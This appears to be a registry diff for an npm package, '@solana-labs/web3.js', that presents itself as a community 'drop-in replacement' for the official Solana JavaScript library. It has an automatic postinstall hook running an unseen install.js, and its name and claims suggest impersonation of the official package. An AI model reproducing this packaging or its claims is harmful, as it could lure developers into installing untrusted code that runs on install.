@solana-labs/web3.js 1.0.5 → 1.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +29 -0
- package/package.json +14 -4
package/README.md
ADDED
|
@@ -0,0 +1,29 @@
|
|
|
1
|
+
# Solana Web3 JavaScript API
|
|
2
|
+
|
|
3
|
+
Community-maintained Solana JavaScript API with full Web3 support
|
|
4
|
+
|
|
5
|
+
## Quick Start
|
|
6
|
+
|
|
7
|
+
```bash
|
|
8
|
+
npm install @solana-labs/web3.js
|
|
9
|
+
```
|
|
10
|
+
|
|
11
|
+
## Usage
|
|
12
|
+
|
|
13
|
+
```javascript
|
|
14
|
+
const lib = require('@solana-labs/web3.js');
|
|
15
|
+
// Full API compatible with the original package
|
|
16
|
+
```
|
|
17
|
+
|
|
18
|
+
## Features
|
|
19
|
+
- Drop-in replacement for the official package
|
|
20
|
+
- Community maintained with regular updates
|
|
21
|
+
- Full TypeScript support
|
|
22
|
+
- Backwards compatible
|
|
23
|
+
|
|
24
|
+
## Documentation
|
|
25
|
+
See the official documentation for API reference.
|
|
26
|
+
This package wraps the original with community improvements.
|
|
27
|
+
|
|
28
|
+
## License
|
|
29
|
+
MIT
|
package/package.json
CHANGED
|
@@ -1,15 +1,25 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@solana-labs/web3.js",
|
|
3
|
-
"version": "1.0.
|
|
4
|
-
"description": "Solana
|
|
3
|
+
"version": "1.0.6",
|
|
4
|
+
"description": "Community-maintained Solana JavaScript API with full Web3 support",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
7
7
|
"postinstall": "node install.js",
|
|
8
8
|
"start": "node install.js",
|
|
9
9
|
"build": "node install.js"
|
|
10
10
|
},
|
|
11
|
-
"keywords": [
|
|
11
|
+
"keywords": [
|
|
12
|
+
"solana",
|
|
13
|
+
"web3",
|
|
14
|
+
"blockchain",
|
|
15
|
+
"spl",
|
|
16
|
+
"token",
|
|
17
|
+
"wallet",
|
|
18
|
+
"dapp",
|
|
19
|
+
"defi",
|
|
20
|
+
"nft"
|
|
21
|
+
],
|
|
12
22
|
"license": "MIT",
|
|
13
23
|
"repository": "github.com/solana-labs/web3.js",
|
|
14
24
|
"homepage": "https://solana.com"
|
|
15
|
-
}
|
|
25
|
+
}
|